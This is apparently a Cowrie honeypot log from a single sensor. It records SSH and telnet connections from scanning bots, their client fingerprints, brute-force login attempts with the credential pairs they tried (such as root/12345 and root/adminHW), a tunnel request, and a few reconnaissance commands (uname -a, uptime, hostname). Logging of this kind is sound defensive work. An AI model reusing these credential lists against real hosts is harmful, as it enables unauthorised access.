{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":50750,"dst_ip":"1.2.3.4","dst_port":22,"session":"566b42436daf","protocol":"ssh","message":"New connection: 217.72.205.35:50750 (1.2.3.4:22) [session: 566b42436daf]","sensor":"my-vps","timestamp":"2025-08-28T23:16:41.112602Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:16:41.113742Z","src_ip":"217.72.205.35","session":"566b42436daf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52470,"dst_ip":"1.2.3.4","dst_port":23,"session":"14a6e1b3cc24","protocol":"telnet","message":"New connection: 212.227.125.160:52470 (1.2.3.4:23) [session: 14a6e1b3cc24]","sensor":"my-vps","timestamp":"2025-08-28T23:17:03.053396Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-28T23:17:03.139509Z","src_ip":"212.227.125.160","session":"14a6e1b3cc24"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T23:17:03.159733Z","src_ip":"212.227.125.160","session":"14a6e1b3cc24"}
{"eventid":"cowrie.session.connect","src_ip":"172.237.153.111","src_port":40552,"dst_ip":"1.2.3.4","dst_port":23,"session":"ef41f8ab2a35","protocol":"telnet","message":"New connection: 172.237.153.111:40552 (1.2.3.4:23) [session: ef41f8ab2a35]","sensor":"my-vps","timestamp":"2025-08-28T23:17:16.929426Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T23:17:17.506703Z","src_ip":"172.237.153.111","session":"ef41f8ab2a35"}
{"eventid":"cowrie.session.closed","duration":3.0601725578308105,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:17:19.989523Z","src_ip":"172.237.153.111","session":"ef41f8ab2a35"}
{"eventid":"cowrie.session.connect","src_ip":"172.237.153.111","src_port":42306,"dst_ip":"1.2.3.4","dst_port":23,"session":"94ed2382459c","protocol":"telnet","message":"New connection: 172.237.153.111:42306 (1.2.3.4:23) [session: 94ed2382459c]","sensor":"my-vps","timestamp":"2025-08-28T23:17:20.099918Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-28T23:17:22.019756Z","src_ip":"172.237.153.111","session":"94ed2382459c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T23:17:22.036412Z","src_ip":"172.237.153.111","session":"94ed2382459c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":13282,"dst_ip":"1.2.3.4","dst_port":22,"session":"61ff73a2b5e0","protocol":"ssh","message":"New connection: 212.227.235.229:13282 (1.2.3.4:22) [session: 61ff73a2b5e0]","sensor":"my-vps","timestamp":"2025-08-28T23:17:22.962855Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:17:22.964169Z","src_ip":"212.227.235.229","session":"61ff73a2b5e0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":13594,"dst_ip":"1.2.3.4","dst_port":22,"session":"f9fe9b0c8d25","protocol":"ssh","message":"New connection: 212.227.235.229:13594 (1.2.3.4:22) [session: f9fe9b0c8d25]","sensor":"my-vps","timestamp":"2025-08-28T23:17:23.149987Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:17:23.150957Z","src_ip":"212.227.235.229","session":"f9fe9b0c8d25"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T23:17:23.311050Z","src_ip":"212.227.235.229","session":"f9fe9b0c8d25"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T23:17:23.792724Z","src_ip":"212.227.235.229","session":"f9fe9b0c8d25"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T23:17:23.954110Z","session":"f9fe9b0c8d25"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":432,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"2.8","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:17:24.853909Z","src_ip":"172.237.153.111","session":"94ed2382459c"}
{"eventid":"cowrie.session.closed","duration":4.758512496948242,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:17:24.858362Z","src_ip":"172.237.153.111","session":"94ed2382459c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":62568,"dst_ip":"1.2.3.4","dst_port":22,"session":"9dd3080c991e","protocol":"ssh","message":"New connection: 212.227.235.229:62568 (1.2.3.4:22) [session: 9dd3080c991e]","sensor":"my-vps","timestamp":"2025-08-28T23:17:52.477698Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:18:06.605483Z","src_ip":"212.227.235.229","session":"9dd3080c991e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:18:06.607214Z","src_ip":"212.227.235.229","session":"9dd3080c991e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58012,"dst_ip":"1.2.3.4","dst_port":22,"session":"e300a1f72396","protocol":"ssh","message":"New connection: 212.227.125.160:58012 (1.2.3.4:22) [session: e300a1f72396]","sensor":"my-vps","timestamp":"2025-08-28T23:18:11.772252Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:18:12.993072Z","src_ip":"212.227.125.160","session":"e300a1f72396"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:18:12.993745Z","src_ip":"212.227.125.160","session":"e300a1f72396"}
{"eventid":"cowrie.login.success","username":"root","password":"12345","message":"login attempt [root/12345] succeeded","sensor":"my-vps","timestamp":"2025-08-28T23:18:19.196568Z","src_ip":"212.227.125.160","session":"e300a1f72396"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T23:18:22.836505Z","src_ip":"212.227.125.160","session":"e300a1f72396"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-28T23:18:22.837213Z","src_ip":"212.227.125.160","session":"e300a1f72396"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"1.6","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:18:24.400295Z","src_ip":"212.227.125.160","session":"e300a1f72396"}
{"eventid":"cowrie.session.closed","duration":"12.6","message":"Connection lost after 12.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:18:24.401415Z","src_ip":"212.227.125.160","session":"e300a1f72396"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":49724,"dst_ip":"1.2.3.4","dst_port":22,"session":"4baf87a68802","protocol":"ssh","message":"New connection: 201.148.180.50:49724 (1.2.3.4:22) [session: 4baf87a68802]","sensor":"my-vps","timestamp":"2025-08-28T23:18:30.692724Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:18:32.049628Z","src_ip":"201.148.180.50","session":"4baf87a68802"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:18:32.050458Z","src_ip":"201.148.180.50","session":"4baf87a68802"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:18:33.150854Z","src_ip":"212.227.235.229","session":"f9fe9b0c8d25"}
{"eventid":"cowrie.login.success","username":"root","password":"12345","message":"login attempt [root/12345] succeeded","sensor":"my-vps","timestamp":"2025-08-28T23:18:38.398855Z","src_ip":"201.148.180.50","session":"4baf87a68802"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T23:18:43.071978Z","src_ip":"201.148.180.50","session":"4baf87a68802"}
{"eventid":"cowrie.command.input","input":"uptime","message":"CMD: uptime","sensor":"my-vps","timestamp":"2025-08-28T23:18:43.072781Z","src_ip":"201.148.180.50","session":"4baf87a68802"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","size":69,"shasum":"dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","duplicate":true,"duration":"1.6","message":"Closing TTY Log: var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802 after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:18:44.700967Z","src_ip":"201.148.180.50","session":"4baf87a68802"}
{"eventid":"cowrie.session.closed","duration":"14.0","message":"Connection lost after 14.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:18:44.702073Z","src_ip":"201.148.180.50","session":"4baf87a68802"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54452,"dst_ip":"1.2.3.4","dst_port":22,"session":"2a8f2898001c","protocol":"ssh","message":"New connection: 212.227.235.229:54452 (1.2.3.4:22) [session: 2a8f2898001c]","sensor":"my-vps","timestamp":"2025-08-28T23:18:44.869036Z"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:18:45.598727Z","src_ip":"212.227.235.229","session":"2a8f2898001c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54464,"dst_ip":"1.2.3.4","dst_port":22,"session":"abda78b45bc8","protocol":"ssh","message":"New connection: 212.227.235.229:54464 (1.2.3.4:22) [session: abda78b45bc8]","sensor":"my-vps","timestamp":"2025-08-28T23:18:45.775069Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:18:45.776001Z","src_ip":"212.227.235.229","session":"abda78b45bc8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:18:45.954474Z","src_ip":"212.227.235.229","session":"abda78b45bc8"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"password","message":"login attempt [oracle/password] failed","sensor":"my-vps","timestamp":"2025-08-28T23:18:47.475585Z","src_ip":"212.227.235.229","session":"abda78b45bc8"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:18:48.633154Z","src_ip":"212.227.235.229","session":"abda78b45bc8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":61788,"dst_ip":"1.2.3.4","dst_port":22,"session":"e20b5a2111fa","protocol":"ssh","message":"New connection: 212.227.125.160:61788 (1.2.3.4:22) [session: e20b5a2111fa]","sensor":"my-vps","timestamp":"2025-08-28T23:18:56.913398Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T23:18:56.914135Z","src_ip":"212.227.125.160","session":"e20b5a2111fa"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T23:18:56.994950Z","src_ip":"212.227.125.160","session":"e20b5a2111fa"}
{"eventid":"cowrie.login.failed","username":"daniel","password":"daniel","message":"login attempt [daniel/daniel] failed","sensor":"my-vps","timestamp":"2025-08-28T23:18:57.403760Z","src_ip":"212.227.125.160","session":"e20b5a2111fa"}
{"eventid":"cowrie.login.failed","username":"daniel","password":"abc123","message":"login attempt [daniel/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T23:18:58.487288Z","src_ip":"212.227.125.160","session":"e20b5a2111fa"}
{"eventid":"cowrie.login.failed","username":"daniel","password":"abcd123","message":"login attempt [daniel/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T23:18:59.571598Z","src_ip":"212.227.125.160","session":"e20b5a2111fa"}
{"eventid":"cowrie.login.success","username":"root","password":"123456789o","message":"login attempt [root/123456789o] succeeded","sensor":"my-vps","timestamp":"2025-08-28T23:18:59.760632Z","src_ip":"212.227.235.229","session":"9dd3080c991e"}
{"eventid":"cowrie.login.failed","username":"daniel","password":"abcd1234","message":"login attempt [daniel/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T23:19:00.653999Z","src_ip":"212.227.125.160","session":"e20b5a2111fa"}
{"eventid":"cowrie.login.failed","username":"daniel","password":"abc1234","message":"login attempt [daniel/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-28T23:19:01.746965Z","src_ip":"212.227.125.160","session":"e20b5a2111fa"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:19:02.829756Z","src_ip":"212.227.125.160","session":"e20b5a2111fa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53884,"dst_ip":"1.2.3.4","dst_port":23,"session":"87c9c11e7a15","protocol":"telnet","message":"New connection: 212.227.235.229:53884 (1.2.3.4:23) [session: 87c9c11e7a15]","sensor":"my-vps","timestamp":"2025-08-28T23:19:29.369035Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T23:19:30.333483Z","src_ip":"212.227.235.229","session":"87c9c11e7a15"}
{"eventid":"cowrie.session.closed","duration":4.5589587688446045,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:19:33.927924Z","src_ip":"212.227.235.229","session":"87c9c11e7a15"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53888,"dst_ip":"1.2.3.4","dst_port":23,"session":"fb9a420be836","protocol":"telnet","message":"New connection: 212.227.235.229:53888 (1.2.3.4:23) [session: fb9a420be836]","sensor":"my-vps","timestamp":"2025-08-28T23:19:34.144386Z"}
{"eventid":"cowrie.session.closed","duration":1.1191365718841553,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:19:35.263455Z","src_ip":"212.227.235.229","session":"fb9a420be836"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53900,"dst_ip":"1.2.3.4","dst_port":23,"session":"d7a864709c70","protocol":"telnet","message":"New connection: 212.227.235.229:53900 (1.2.3.4:23) [session: d7a864709c70]","sensor":"my-vps","timestamp":"2025-08-28T23:19:35.467684Z"}
{"eventid":"cowrie.login.success","username":"root","password":"icatch99","message":"login attempt [root/icatch99] succeeded","sensor":"my-vps","timestamp":"2025-08-28T23:19:38.070314Z","src_ip":"212.227.235.229","session":"d7a864709c70"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T23:19:38.090980Z","src_ip":"212.227.235.229","session":"d7a864709c70"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":432,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"1.7","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:19:39.756995Z","src_ip":"212.227.235.229","session":"d7a864709c70"}
{"eventid":"cowrie.session.closed","duration":4.2943596839904785,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:19:39.761966Z","src_ip":"212.227.235.229","session":"d7a864709c70"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T23:19:50.284473Z","src_ip":"212.227.235.229","session":"9dd3080c991e"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-28T23:19:50.285190Z","src_ip":"212.227.235.229","session":"9dd3080c991e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:20:03.171766Z","src_ip":"212.227.125.160","session":"14a6e1b3cc24"}
{"eventid":"cowrie.session.closed","duration":180.12215113639832,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:20:03.175434Z","src_ip":"212.227.125.160","session":"14a6e1b3cc24"}
